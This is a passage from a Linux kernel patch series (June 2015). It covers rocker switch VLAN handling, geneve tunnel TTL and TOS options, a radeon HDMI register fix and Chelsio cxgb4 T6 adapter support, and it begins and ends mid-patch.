the port's original internal VLAN ID. (The internal VLAN ID is used by device to internally mark untagged pkts with some VLAN, which will eventually be removed on egress...think PVID). When the internal VLAN ID changes, we need to update the VLAN table entries and the router MAC entries for IP/IPv6 to reflect the new internal VLAN ID. This patch makes use of the common rocker_port_vlan_add/del functions to make sure the tables are updated for the current internal VLAN ID. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 42 +++++++++++++++++----------- 1 file changed, 25 insertions(+), 17 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index 076f3f29fe5c..357f55d4e466 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -5153,41 +5153,49 @@ static bool rocker_port_dev_check(const struct net_device *dev) static int rocker_port_bridge_join(struct rocker_port *rocker_port, struct net_device *bridge) { + u16 untagged_vid = 0; int err; - rocker_port_internal_vlan_id_put(rocker_port, - rocker_port->dev->ifindex); - - rocker_port->bridge_dev = bridge; + /* Port is joining bridge, so the internal VLAN for the + * port is going to change to the bridge internal VLAN. + * Let's remove untagged VLAN (vid=0) from port and + * re-add once internal VLAN has changed. + */ - /* Use bridge internal VLAN ID for untagged pkts */ - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, 0); + err = rocker_port_vlan_del(rocker_port, untagged_vid, 0); if (err) return err; + + rocker_port_internal_vlan_id_put(rocker_port, + rocker_port->dev->ifindex); rocker_port->internal_vlan_id = rocker_port_internal_vlan_id_get(rocker_port, bridge->ifindex); - return rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, 0, 0); + + rocker_port->bridge_dev = bridge; + + return rocker_port_vlan_add(rocker_port, SWITCHDEV_TRANS_NONE, + untagged_vid, 0); } static int rocker_port_bridge_leave(struct rocker_port *rocker_port) { + u16 untagged_vid = 0; int err; - rocker_port_internal_vlan_id_put(rocker_port, - rocker_port->bridge_dev->ifindex); - - rocker_port->bridge_dev = NULL; - - /* Use port internal VLAN ID for untagged pkts */ - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, 0); + err = rocker_port_vlan_del(rocker_port, untagged_vid, 0); if (err) return err; + + rocker_port_internal_vlan_id_put(rocker_port, + rocker_port->bridge_dev->ifindex); rocker_port->internal_vlan_id = rocker_port_internal_vlan_id_get(rocker_port, rocker_port->dev->ifindex); - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, 0, 0); + + rocker_port->bridge_dev = NULL; + + err = rocker_port_vlan_add(rocker_port, SWITCHDEV_TRANS_NONE, + untagged_vid, 0); if (err) return err; From 2aa2ed0864b3cf96479a401c449dd4a3eea15ce8 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:06 -0700 Subject: [PATCH 574/872] rocker: remove support for legacy VLAN ndo ops Remove support for legacy ndo ops .ndo_vlan_rx_add_vid/.ndo_vlan_rx_kill_vid. Rocker will use bridge_setlink/dellink exclusively for VLAN add/del operations. The legacy ops are needed if using 8021q driver module to setup VLANs on the port. But an alternative exists in using bridge_setlink/delink to setup VLANs, which doesn't depend on 8021q module. So rocker will switch to the newer setlink/dellink ops. VLANs can added/delete from the port, regardless if port is bridged or not, using the bridge commands: bridge vlan [add|del] vid VID dev DEV self (Yes, I agree it's confusing to use the "bridge" command to set a VLAN on a non-bridged port). Using setlink/dellink over legacy ops let's us handle the stacked driver case automatically. It's built-in. setlink also pass additional flags (PVID, egress untagged) that aren't available with the legacy ops. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 34 +--------------------------- 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index 357f55d4e466..819289e5be4f 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -4164,35 +4164,6 @@ static int rocker_port_set_mac_address(struct net_device *dev, void *p) return 0; } -static int rocker_port_vlan_rx_add_vid(struct net_device *dev, - __be16 proto, u16 vid) -{ - struct rocker_port *rocker_port = netdev_priv(dev); - int err; - - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, 0, vid); - if (err) - return err; - - return rocker_port_router_mac(rocker_port, SWITCHDEV_TRANS_NONE, - 0, htons(vid)); -} - -static int rocker_port_vlan_rx_kill_vid(struct net_device *dev, - __be16 proto, u16 vid) -{ - struct rocker_port *rocker_port = netdev_priv(dev); - int err; - - err = rocker_port_router_mac(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, htons(vid)); - if (err) - return err; - - return rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, vid); -} - static int rocker_port_get_phys_port_name(struct net_device *dev, char *buf, size_t len) { @@ -4213,8 +4184,6 @@ static const struct net_device_ops rocker_port_netdev_ops = { .ndo_stop = rocker_port_stop, .ndo_start_xmit = rocker_port_xmit, .ndo_set_mac_address = rocker_port_set_mac_address, - .ndo_vlan_rx_add_vid = rocker_port_vlan_rx_add_vid, - .ndo_vlan_rx_kill_vid = rocker_port_vlan_rx_kill_vid, .ndo_bridge_getlink = switchdev_port_bridge_getlink, .ndo_bridge_setlink = switchdev_port_bridge_setlink, .ndo_bridge_dellink = switchdev_port_bridge_dellink, @@ -4883,8 +4852,7 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) NAPI_POLL_WEIGHT); rocker_carrier_init(rocker_port); - dev->features |= NETIF_F_NETNS_LOCAL | - NETIF_F_HW_VLAN_CTAG_FILTER; + dev->features |= NETIF_F_NETNS_LOCAL; err = register_netdev(dev); if (err) { From 8760ce58353c2099be35ead62a572ee2d1e83b5b Mon Sep 17 00:00:00 2001 From: "John W. Linville" Date: Mon, 1 Jun 2015 15:51:34 -0400 Subject: [PATCH 575/872] geneve: allow user to specify TTL for tunnel frames Signed-off-by: John W. Linville Signed-off-by: David S. Miller --- drivers/net/geneve.c | 18 ++++++++++++++---- include/uapi/linux/if_link.h | 1 + 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c index b7eafa4c1a67..1675dfdbfa70 100644 --- a/drivers/net/geneve.c +++ b/drivers/net/geneve.c @@ -44,7 +44,8 @@ struct geneve_dev { struct net *net; /* netns for packet i/o */ struct net_device *dev; /* netdev for geneve tunnel */ struct geneve_sock *sock; /* socket used for geneve tunnel */ - u8 vni[3]; /* virtual network ID for tunnel */ + u8 vni[3]; /* virtual network ID for tunnel */ + u8 ttl; /* TTL override */ struct sockaddr_in remote; /* IPv4 address for link partner */ struct list_head next; /* geneve's per namespace list */ }; @@ -184,7 +185,7 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) struct flowi4 fl4; int err; __be16 sport; - __u8 tos, ttl = 0; + __u8 tos, ttl; iip = ip_hdr(skb); @@ -207,11 +208,12 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) goto rt_tx_error; } - /* TODO: tos and ttl should be configurable */ + /* TODO: tos should be configurable */ tos = ip_tunnel_ecn_encap(0, iip, skb); - if (IN_MULTICAST(ntohl(fl4.daddr))) + ttl = geneve->ttl; + if (!ttl && IN_MULTICAST(ntohl(fl4.daddr))) ttl = 1; ttl = ttl ? : ip4_dst_hoplimit(&rt->dst); @@ -297,6 +299,7 @@ static void geneve_setup(struct net_device *dev) static const struct nla_policy geneve_policy[IFLA_GENEVE_MAX + 1] = { [IFLA_GENEVE_ID] = { .type = NLA_U32 }, [IFLA_GENEVE_REMOTE] = { .len = FIELD_SIZEOF(struct iphdr, daddr) }, + [IFLA_GENEVE_TTL] = { .type = NLA_U8 }, }; static int geneve_validate(struct nlattr *tb[], struct nlattr *data[]) @@ -364,6 +367,9 @@ static int geneve_newlink(struct net *net, struct net_device *dev, if (err) return err; + if (data[IFLA_GENEVE_TTL]) + geneve->ttl = nla_get_u8(data[IFLA_GENEVE_TTL]); + list_add(&geneve->next, &gn->geneve_list); hlist_add_head_rcu(&geneve->hlist, &gn->vni_list[hash]); @@ -386,6 +392,7 @@ static size_t geneve_get_size(const struct net_device *dev) { return nla_total_size(sizeof(__u32)) + /* IFLA_GENEVE_ID */ nla_total_size(sizeof(struct in_addr)) + /* IFLA_GENEVE_REMOTE */ + nla_total_size(sizeof(__u8)) + /* IFLA_GENEVE_TTL */ 0; } @@ -402,6 +409,9 @@ static int geneve_fill_info(struct sk_buff *skb, const struct net_device *dev) geneve->remote.sin_addr.s_addr)) goto nla_put_failure; + if (nla_put_u8(skb, IFLA_GENEVE_TTL, geneve->ttl)) + goto nla_put_failure; + return 0; nla_put_failure: diff --git a/include/uapi/linux/if_link.h b/include/uapi/linux/if_link.h index afccc9393fef..a834f31db915 100644 --- a/include/uapi/linux/if_link.h +++ b/include/uapi/linux/if_link.h @@ -395,6 +395,7 @@ enum { IFLA_GENEVE_UNSPEC, IFLA_GENEVE_ID, IFLA_GENEVE_REMOTE, + IFLA_GENEVE_TTL, __IFLA_GENEVE_MAX }; #define IFLA_GENEVE_MAX (__IFLA_GENEVE_MAX - 1) From d89511251f6519599b109dc6cda87a6ab314ed8c Mon Sep 17 00:00:00 2001 From: "John W. Linville" Date: Mon, 1 Jun 2015 15:51:35 -0400 Subject: [PATCH 576/872] geneve: allow user to specify TOS info for tunnel frames Signed-off-by: John W. Linville Signed-off-by: David S. Miller --- drivers/net/geneve.c | 18 ++++++++++++++---- include/uapi/linux/if_link.h | 1 + 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c index 1675dfdbfa70..78d49d186e05 100644 --- a/drivers/net/geneve.c +++ b/drivers/net/geneve.c @@ -46,6 +46,7 @@ struct geneve_dev { struct geneve_sock *sock; /* socket used for geneve tunnel */ u8 vni[3]; /* virtual network ID for tunnel */ u8 ttl; /* TTL override */ + u8 tos; /* TOS override */ struct sockaddr_in remote; /* IPv4 address for link partner */ struct list_head next; /* geneve's per namespace list */ }; @@ -194,7 +195,12 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) /* TODO: port min/max limits should be configurable */ sport = udp_flow_src_port(dev_net(dev), skb, 0, 0, true); + tos = geneve->tos; + if (tos == 1) + tos = ip_tunnel_get_dsfield(iip, skb); + memset(&fl4, 0, sizeof(fl4)); + fl4.flowi4_tos = RT_TOS(tos); fl4.daddr = geneve->remote.sin_addr.s_addr; rt = ip_route_output_key(geneve->net, &fl4); if (IS_ERR(rt)) { @@ -208,9 +214,7 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) goto rt_tx_error; } - /* TODO: tos should be configurable */ - - tos = ip_tunnel_ecn_encap(0, iip, skb); + tos = ip_tunnel_ecn_encap(tos, iip, skb); ttl = geneve->ttl; if (!ttl && IN_MULTICAST(ntohl(fl4.daddr))) @@ -300,6 +304,7 @@ static const struct nla_policy geneve_policy[IFLA_GENEVE_MAX + 1] = { [IFLA_GENEVE_ID] = { .type = NLA_U32 }, [IFLA_GENEVE_REMOTE] = { .len = FIELD_SIZEOF(struct iphdr, daddr) }, [IFLA_GENEVE_TTL] = { .type = NLA_U8 }, + [IFLA_GENEVE_TOS] = { .type = NLA_U8 }, }; static int geneve_validate(struct nlattr *tb[], struct nlattr *data[]) @@ -370,6 +375,9 @@ static int geneve_newlink(struct net *net, struct net_device *dev, if (data[IFLA_GENEVE_TTL]) geneve->ttl = nla_get_u8(data[IFLA_GENEVE_TTL]); + if (data[IFLA_GENEVE_TOS]) + geneve->tos = nla_get_u8(data[IFLA_GENEVE_TOS]); + list_add(&geneve->next, &gn->geneve_list); hlist_add_head_rcu(&geneve->hlist, &gn->vni_list[hash]); @@ -393,6 +401,7 @@ static size_t geneve_get_size(const struct net_device *dev) return nla_total_size(sizeof(__u32)) + /* IFLA_GENEVE_ID */ nla_total_size(sizeof(struct in_addr)) + /* IFLA_GENEVE_REMOTE */ nla_total_size(sizeof(__u8)) + /* IFLA_GENEVE_TTL */ + nla_total_size(sizeof(__u8)) + /* IFLA_GENEVE_TOS */ 0; } @@ -409,7 +418,8 @@ static int geneve_fill_info(struct sk_buff *skb, const struct net_device *dev) geneve->remote.sin_addr.s_addr)) goto nla_put_failure; - if (nla_put_u8(skb, IFLA_GENEVE_TTL, geneve->ttl)) + if (nla_put_u8(skb, IFLA_GENEVE_TTL, geneve->ttl) || + nla_put_u8(skb, IFLA_GENEVE_TOS, geneve->tos)) goto nla_put_failure; return 0; diff --git a/include/uapi/linux/if_link.h b/include/uapi/linux/if_link.h index a834f31db915..1737b7a8272b 100644 --- a/include/uapi/linux/if_link.h +++ b/include/uapi/linux/if_link.h @@ -396,6 +396,7 @@ enum { IFLA_GENEVE_ID, IFLA_GENEVE_REMOTE, IFLA_GENEVE_TTL, + IFLA_GENEVE_TOS, __IFLA_GENEVE_MAX }; #define IFLA_GENEVE_MAX (__IFLA_GENEVE_MAX - 1) From 091f0a70ffe2a1297d52fe32d6c6794d955e01e5 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Mon, 1 Jun 2015 18:10:24 -0400 Subject: [PATCH 577/872] drm/radeon: use proper ACR regisiter for DCE3.2 Using the DCE2 one by accident afer the audio rework. Bug: https://bugs.freedesktop.org/show_bug.cgi?id=90777 Signed-off-by: Alex Deucher Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/dce3_1_afmt.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/radeon/dce3_1_afmt.c b/drivers/gpu/drm/radeon/dce3_1_afmt.c index f04205170b8a..cfa3a84a2af0 100644 --- a/drivers/gpu/drm/radeon/dce3_1_afmt.c +++ b/drivers/gpu/drm/radeon/dce3_1_afmt.c @@ -173,7 +173,7 @@ void dce3_2_hdmi_update_acr(struct drm_encoder *encoder, long offset, struct drm_device *dev = encoder->dev; struct radeon_device *rdev = dev->dev_private; - WREG32(HDMI0_ACR_PACKET_CONTROL + offset, + WREG32(DCE3_HDMI0_ACR_PACKET_CONTROL + offset, HDMI0_ACR_SOURCE | /* select SW CTS value */ HDMI0_ACR_AUTO_SEND); /* allow hw to sent ACR packets when required */ From ab4b583b8333afb8bdb7e698a49921dfab80d128 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Tue, 2 Jun 2015 13:59:38 +0530 Subject: [PATCH 578/872] cxgb4: Add is_t6 macro and T6 register ranges Adds new macro is_t6 and adds the register address range for T6 adapter Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 10 + drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 344 +++++++++++++++++++++ 2 files changed, 354 insertions(+) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 15cca3013de2..83773f3bf2e7 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -273,6 +273,7 @@ struct pci_params { #define CHELSIO_T4 0x4 #define CHELSIO_T5 0x5 +#define CHELSIO_T6 0x6 enum chip_type { T4_A1 = CHELSIO_CHIP_CODE(CHELSIO_T4, 1), @@ -284,6 +285,10 @@ enum chip_type { T5_A1 = CHELSIO_CHIP_CODE(CHELSIO_T5, 1), T5_FIRST_REV = T5_A0, T5_LAST_REV = T5_A1, + + T6_A0 = CHELSIO_CHIP_CODE(CHELSIO_T6, 0), + T6_FIRST_REV = T6_A0, + T6_LAST_REV = T6_A0, }; struct devlog_params { @@ -850,6 +855,11 @@ enum { VLAN_REWRITE }; +static inline int is_t6(enum chip_type chip) +{ + return CHELSIO_CHIP_VERSION(chip) == CHELSIO_T6; +} + static inline int is_t5(enum chip_type chip) { return CHELSIO_CHIP_VERSION(chip) == CHELSIO_T5; diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 36a858c24305..e9ccfeb4ec03 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -634,6 +634,7 @@ unsigned int t4_get_regs_len(struct adapter *adapter) return T4_REGMAP_SIZE; case CHELSIO_T5: + case CHELSIO_T6: return T5_REGMAP_SIZE; } @@ -1316,6 +1317,344 @@ void t4_get_regs(struct adapter *adap, void *buf, size_t buf_size) 0x51300, 0x51308, }; + static const unsigned int t6_reg_ranges[] = { + 0x1008, 0x114c, + 0x1180, 0x11b4, + 0x11fc, 0x1250, + 0x1280, 0x133c, + 0x1800, 0x18fc, + 0x3000, 0x302c, + 0x3060, 0x30d8, + 0x30e0, 0x30fc, + 0x3140, 0x357c, + 0x35a8, 0x35cc, + 0x35ec, 0x35ec, + 0x3600, 0x5624, + 0x56cc, 0x575c, + 0x580c, 0x5814, + 0x5890, 0x58bc, + 0x5940, 0x595c, + 0x5980, 0x598c, + 0x59b0, 0x59dc, + 0x59fc, 0x5a18, + 0x5a60, 0x5a6c, + 0x5a80, 0x5a9c, + 0x5b94, 0x5bfc, + 0x5c10, 0x5ec0, + 0x5ec8, 0x5ec8, + 0x6000, 0x6040, + 0x6058, 0x6154, + 0x7700, 0x7798, + 0x77c0, 0x7880, + 0x78cc, 0x78fc, + 0x7b00, 0x7c54, + 0x7d00, 0x7efc, + 0x8dc0, 0x8de0, + 0x8df8, 0x8e84, + 0x8ea0, 0x8f88, + 0x8fb8, 0x911c, + 0x9400, 0x9470, + 0x9600, 0x971c, + 0x9800, 0x9808, + 0x9820, 0x983c, + 0x9850, 0x9864, + 0x9c00, 0x9c6c, + 0x9c80, 0x9cec, + 0x9d00, 0x9d6c, + 0x9d80, 0x9dec, + 0x9e00, 0x9e6c, + 0x9e80, 0x9eec, + 0x9f00, 0x9f6c, + 0x9f80, 0xa020, + 0xd004, 0xd03c, + 0xdfc0, 0xdfe0, + 0xe000, 0xf008, + 0x11000, 0x11014, + 0x11048, 0x11110, + 0x11118, 0x1117c, + 0x11190, 0x11260, + 0x11300, 0x1130c, + 0x12000, 0x1205c, + 0x19040, 0x1906c, + 0x19078, 0x19080, + 0x1908c, 0x19124, + 0x19150, 0x191b0, + 0x191d0, 0x191e8, + 0x19238, 0x192b8, + 0x193f8, 0x19474, + 0x19490, 0x194cc, + 0x194f0, 0x194f8, + 0x19c00, 0x19c80, + 0x19c94, 0x19cbc, + 0x19ce4, 0x19d28, + 0x19d50, 0x19d78, + 0x19d94, 0x19dc8, + 0x19df0, 0x19e10, + 0x19e50, 0x19e6c, + 0x19ea0, 0x19f34, + 0x19f40, 0x19f50, + 0x19f90, 0x19fac, + 0x19fc4, 0x19fe4, + 0x1a000, 0x1a06c, + 0x1a0b0, 0x1a120, + 0x1a128, 0x1a138, + 0x1a190, 0x1a1c4, + 0x1a1fc, 0x1a1fc, + 0x1e008, 0x1e00c, + 0x1e040, 0x1e04c, + 0x1e284, 0x1e290, + 0x1e2c0, 0x1e2c0, + 0x1e2e0, 0x1e2e0, + 0x1e300, 0x1e384, + 0x1e3c0, 0x1e3c8, + 0x1e408, 0x1e40c, + 0x1e440, 0x1e44c, + 0x1e684, 0x1e690, + 0x1e6c0, 0x1e6c0, + 0x1e6e0, 0x1e6e0, + 0x1e700, 0x1e784, + 0x1e7c0, 0x1e7c8, + 0x1e808, 0x1e80c, + 0x1e840, 0x1e84c, + 0x1ea84, 0x1ea90, + 0x1eac0, 0x1eac0, + 0x1eae0, 0x1eae0, + 0x1eb00, 0x1eb84, + 0x1ebc0, 0x1ebc8, + 0x1ec08, 0x1ec0c, + 0x1ec40, 0x1ec4c, + 0x1ee84, 0x1ee90, + 0x1eec0, 0x1eec0, + 0x1eee0, 0x1eee0, + 0x1ef00, 0x1ef84, + 0x1efc0, 0x1efc8, + 0x1f008, 0x1f00c, + 0x1f040, 0x1f04c, + 0x1f284, 0x1f290, + 0x1f2c0, 0x1f2c0, + 0x1f2e0, 0x1f2e0, + 0x1f300, 0x1f384, + 0x1f3c0, 0x1f3c8, + 0x1f408, 0x1f40c, + 0x1f440, 0x1f44c, + 0x1f684, 0x1f690, + 0x1f6c0, 0x1f6c0, + 0x1f6e0, 0x1f6e0, + 0x1f700, 0x1f784, + 0x1f7c0, 0x1f7c8, + 0x1f808, 0x1f80c, + 0x1f840, 0x1f84c, + 0x1fa84, 0x1fa90, + 0x1fac0, 0x1fac0, + 0x1fae0, 0x1fae0, + 0x1fb00, 0x1fb84, + 0x1fbc0, 0x1fbc8, + 0x1fc08, 0x1fc0c, + 0x1fc40, 0x1fc4c, + 0x1fe84, 0x1fe90, + 0x1fec0, 0x1fec0, + 0x1fee0, 0x1fee0, + 0x1ff00, 0x1ff84, + 0x1ffc0, 0x1ffc8, + 0x30000, 0x30070, + 0x30100, 0x3015c, + 0x30190, 0x301d0, + 0x30200, 0x30318, + 0x30400, 0x3052c, + 0x30540, 0x3061c, + 0x30800, 0x3088c, + 0x308c0, 0x30908, + 0x30910, 0x309b8, + 0x30a00, 0x30a04, + 0x30a0c, 0x30a2c, + 0x30a44, 0x30a50, + 0x30a74, 0x30c24, + 0x30d00, 0x30d3c, + 0x30d44, 0x30d7c, + 0x30de0, 0x30de0, + 0x30e00, 0x30ed4, + 0x30f00, 0x30fa4, + 0x30fc0, 0x30fc4, + 0x31000, 0x31004, + 0x31080, 0x310fc, + 0x31208, 0x31220, + 0x3123c, 0x31254, + 0x31300, 0x31300, + 0x31308, 0x3131c, + 0x31338, 0x3133c, + 0x31380, 0x31380, + 0x31388, 0x313a8, + 0x313b4, 0x313b4, + 0x31400, 0x31420, + 0x31438, 0x3143c, + 0x31480, 0x31480, + 0x314a8, 0x314a8, + 0x314b0, 0x314b4, + 0x314c8, 0x314d4, + 0x31a40, 0x31a4c, + 0x31af0, 0x31b20, + 0x31b38, 0x31b3c, + 0x31b80, 0x31b80, + 0x31ba8, 0x31ba8, + 0x31bb0, 0x31bb4, + 0x31bc8, 0x31bd4, + 0x32140, 0x3218c, + 0x321f0, 0x32200, + 0x32218, 0x32218, + 0x32400, 0x32400, + 0x32408, 0x3241c, + 0x32618, 0x32620, + 0x32664, 0x32664, + 0x326a8, 0x326a8, + 0x326ec, 0x326ec, + 0x32a00, 0x32abc, + 0x32b00, 0x32b78, + 0x32c00, 0x32c00, + 0x32c08, 0x32c3c, + 0x32e00, 0x32e2c, + 0x32f00, 0x32f2c, + 0x33000, 0x330ac, + 0x330c0, 0x331ac, + 0x331c0, 0x332c4, + 0x332e4, 0x333c4, + 0x333e4, 0x334ac, + 0x334c0, 0x335ac, + 0x335c0, 0x336c4, + 0x336e4, 0x337c4, + 0x337e4, 0x337fc, + 0x33814, 0x33814, + 0x33854, 0x33868, + 0x33880, 0x3388c, + 0x338c0, 0x338d0, + 0x338e8, 0x338ec, + 0x33900, 0x339ac, + 0x339c0, 0x33ac4, + 0x33ae4, 0x33b10, + 0x33b24, 0x33b50, + 0x33bf0, 0x33c10, + 0x33c24, 0x33c50, + 0x33cf0, 0x33cfc, + 0x34000, 0x34070, + 0x34100, 0x3415c, + 0x34190, 0x341d0, + 0x34200, 0x34318, + 0x34400, 0x3452c, + 0x34540, 0x3461c, + 0x34800, 0x3488c, + 0x348c0, 0x34908, + 0x34910, 0x349b8, + 0x34a00, 0x34a04, + 0x34a0c, 0x34a2c, + 0x34a44, 0x34a50, + 0x34a74, 0x34c24, + 0x34d00, 0x34d3c, + 0x34d44, 0x34d7c, + 0x34de0, 0x34de0, + 0x34e00, 0x34ed4, + 0x34f00, 0x34fa4, + 0x34fc0, 0x34fc4, + 0x35000, 0x35004, + 0x35080, 0x350fc, + 0x35208, 0x35220, + 0x3523c, 0x35254, + 0x35300, 0x35300, + 0x35308, 0x3531c, + 0x35338, 0x3533c, + 0x35380, 0x35380, + 0x35388, 0x353a8, + 0x353b4, 0x353b4, + 0x35400, 0x35420, + 0x35438, 0x3543c, + 0x35480, 0x35480, + 0x354a8, 0x354a8, + 0x354b0, 0x354b4, + 0x354c8, 0x354d4, + 0x35a40, 0x35a4c, + 0x35af0, 0x35b20, + 0x35b38, 0x35b3c, + 0x35b80, 0x35b80, + 0x35ba8, 0x35ba8, + 0x35bb0, 0x35bb4, + 0x35bc8, 0x35bd4, + 0x36140, 0x3618c, + 0x361f0, 0x36200, + 0x36218, 0x36218, + 0x36400, 0x36400, + 0x36408, 0x3641c, + 0x36618, 0x36620, + 0x36664, 0x36664, + 0x366a8, 0x366a8, + 0x366ec, 0x366ec, + 0x36a00, 0x36abc, + 0x36b00, 0x36b78, + 0x36c00, 0x36c00, + 0x36c08, 0x36c3c, + 0x36e00, 0x36e2c, + 0x36f00, 0x36f2c, + 0x37000, 0x370ac, + 0x370c0, 0x371ac, + 0x371c0, 0x372c4, + 0x372e4, 0x373c4, + 0x373e4, 0x374ac, + 0x374c0, 0x375ac, + 0x375c0, 0x376c4, + 0x376e4, 0x377c4, + 0x377e4, 0x377fc, + 0x37814, 0x37814, + 0x37854, 0x37868, + 0x37880, 0x3788c, + 0x378c0, 0x378d0, + 0x378e8, 0x378ec, + 0x37900, 0x379ac, + 0x379c0, 0x37ac4, + 0x37ae4, 0x37b10, + 0x37b24, 0x37b50, + 0x37bf0, 0x37c10, + 0x37c24, 0x37c50, + 0x37cf0, 0x37cfc, + 0x40040, 0x40040, + 0x40080, 0x40084, + 0x40100, 0x40100, + 0x40140, 0x401bc, + 0x40200, 0x40214, + 0x40228, 0x40228, + 0x40240, 0x40258, + 0x40280, 0x40280, + 0x40304, 0x40304, + 0x40330, 0x4033c, + 0x41304, 0x413dc, + 0x41400, 0x4141c, + 0x41480, 0x414d0, + 0x44000, 0x4407c, + 0x440c0, 0x4427c, + 0x442c0, 0x4447c, + 0x444c0, 0x4467c, + 0x446c0, 0x4487c, + 0x448c0, 0x44a7c, + 0x44ac0, 0x44c7c, + 0x44cc0, 0x44e7c, + 0x44ec0, 0x4507c, + 0x450c0, 0x451fc, + 0x45800, 0x45868, + 0x45880, 0x45884, + 0x458a0, 0x458b0, + 0x45a00, 0x45a68, + 0x45a80, 0x45a84, + 0x45aa0, 0x45ab0, + 0x460c0, 0x460e4, + 0x47000, 0x4708c, + 0x47200, 0x47250, + 0x47400, 0x47420, + 0x47600, 0x47618, + 0x47800, 0x4782c, + 0x50000, 0x500cc, + 0x50400, 0x50400, + 0x50800, 0x508cc, + 0x50c00, 0x50c00, + 0x51000, 0x510b0, + 0x51300, 0x51324, + }; + u32 *buf_end = (u32 *)((char *)buf + buf_size); const unsigned int *reg_ranges; int reg_ranges_size, range; @@ -1335,6 +1674,11 @@ void t4_get_regs(struct adapter *adap, void *buf, size_t buf_size) reg_ranges_size = ARRAY_SIZE(t5_reg_ranges); break; + case CHELSIO_T6: + reg_ranges = t6_reg_ranges; + reg_ranges_size = ARRAY_SIZE(t6_reg_ranges); + break; + default: dev_err(adap->pdev_dev, "Unsupported chip version %d\n", chip_version); From 3ccc6cf74d8c0059ae076aee3bf83c9124815404 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Tue, 2 Jun 2015 13:59:39 +0530 Subject: [PATCH 579/872] cxgb4: Adds support for T6 adapter Adds NIC driver related changes for T6 adapter. Register related changes, MC related changes, VF related changes, doorbell related changes, debugfs changes, etc Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 11 +- .../ethernet/chelsio/cxgb4/cxgb4_debugfs.c | 180 +++++++++++---- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 47 +++- drivers/net/ethernet/chelsio/cxgb4/sge.c | 47 ++-- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 218 +++++++++++++----- drivers/net/ethernet/chelsio/cxgb4/t4_msg.h | 3 + drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 105 +++++++++ .../net/ethernet/chelsio/cxgb4/t4_values.h | 1 + drivers/net/ethernet/chelsio/cxgb4/t4fw_api.h | 56 +++-- .../net/ethernet/chelsio/cxgb4/t4fw_version.h | 5 + 10 files changed, 524 insertions(+), 149 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 83773f3bf2e7..4d3a8c20eb12 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -224,7 +224,6 @@ struct sge_params { }; struct tp_params { - unsigned int ntxchan; /* # of Tx channels */ unsigned int tre; /* log2 of core clocks per TP tick */ unsigned int la_mask; /* what events are recorded by TP LA */ unsigned short tx_modq_map; /* TX modulation scheduler queue to */ @@ -297,6 +296,15 @@ struct devlog_params { u32 size; /* size of log */ }; +/* Stores chip specific parameters */ +struct arch_specific_params { + u8 nchan; + u16 mps_rplc_size; + u16 vfcount; + u32 sge_fl_db; + u16 mps_tcam_size; +}; + struct adapter_params { struct sge_params sge; struct tp_params tp; @@ -322,6 +330,7 @@ struct adapter_params { unsigned char nports; /* # of ethernet ports */ unsigned char portvec; enum chip_type chip; /* chip code */ + struct arch_specific_params arch; /* chip specific params */ unsigned char offload; unsigned char bypass; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c index 7cb423745974..3719807efddd 100644 --- 